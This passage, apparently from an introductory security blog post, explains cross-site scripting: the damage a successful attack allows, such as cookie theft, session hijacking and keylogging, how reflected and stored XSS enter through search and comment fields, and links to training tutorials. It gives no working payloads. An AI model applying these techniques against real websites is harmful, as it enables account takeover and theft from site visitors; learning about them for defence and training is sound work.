If successful, this technique opens up a wide variety of options to the attacker:
– stealing cookies and impersonating a different user’s session (if this user happens to be an admin, it’s your lucky day),
– resetting other users’ passwords,
– redirecting users to a different and malicious web site,
– running a keylogger on the victim users’ machines, etc.
How do you do it?
Another common method is to type or paste the code into entry fields on a target web page, that then get reflected on the page. This is typically the case of search fields (when the search results are then displayed on the page), comment fields on blog posts, or even posts on forums, chats or other social media.
In this case, there is no need for phising attacks. Including the malicious code in a comment field on a blog post will store the code in the site’s content database. The code will then be executed every time a subsequent user will visit the post (and since the code is executed, it will not be treated as text and will not be displayed on the page, this means users will not actually see it on the page). This is called stored XSS.
However, some web developers may lack a full understanding of XSS and leave their site insufficiently sanitized. That’s where an attacker can have leverage.
Hungry for more?
You can take things further with :
Bugcrowd University’s XSS video tutorial.
HackerSploit’s XSS video tutorial.
TryHackMe also has two XSS training rooms here and here.